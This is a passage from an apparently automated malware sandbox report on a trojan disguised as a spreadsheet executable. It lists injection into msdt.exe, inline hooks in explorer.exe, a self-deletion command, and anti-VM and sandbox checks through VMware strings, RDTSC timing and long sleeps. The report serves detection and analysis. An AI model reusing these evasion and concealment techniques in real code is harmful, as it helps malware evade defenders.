          Source: 6.0.PI L032452021xxls.exe.670000.0.unpack, Form1.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 0_2_005B297F push 20000001h; retf
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 5_2_0039297F push 20000001h; retf
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0040D2ED push esi; iretd
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_004163C0 push esi; iretd
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0040E38A push eax; iretd
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041E546 push ss; ret
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041BEC5 push FFFFFFE5h; iretd
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_004166F7 push 0000002Ah; ret
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041CEB5 push eax; ret
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041CF6C push eax; ret
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_0067297F push 20000001h; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0510D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3D8CD push 0000000Ah; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D2D2ED push esi; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D363C0 push esi; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D2E38A push eax; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3E546 push ss; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3BEC5 push FFFFFFE5h; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D366F7 push 0000002Ah; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3CF6C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3CF02 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_00D3CF0B push eax; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.55314321358

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE6
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\PI L032452021xxls.exe'
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: /c del 'C:\Users\user\Desktop\PI L032452021xxls.exe'
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: PI L032452021xxls.exe PID: 660, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000D298E4 second address: 0000000000D298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000D29B5E second address: 0000000000D29B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PI L032452021xxls.exe TID: 5112Thread sleep time: -33340s >= -30000s
          Source: C:\Users\user\Desktop\PI L032452021xxls.exe TID: 6432Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeThread delayed: delay time: 33340
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.439409622.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.397384465.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000007.00000000.406640452.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.411680462.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.397384465.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000007.00000000.391165032.000000000461E000.00000004.00000001.sdmpBinary or memory string: Prod_VMware_SATA*
          Source: explorer.exe, 00000007.00000000.411680462.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000007.00000000.397099354.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PI L032452021xxls.exe, 00000000.00000002.382824881.0000000002A32000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000007.00000000.397099354.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000007.00000000.439409622.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000007.00000000.429962276.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeCode function: 6_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PI L032452021xxls.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0513A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05188D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05133540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05168DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_051441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05137016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05137016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05137016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05184015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05184015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05171C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0518740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0518740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0518740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05136C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_0514C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05172073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05181074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05133884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_05133884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 17_2_050E20A0 mov eax, dword ptr fs:[00000030h]
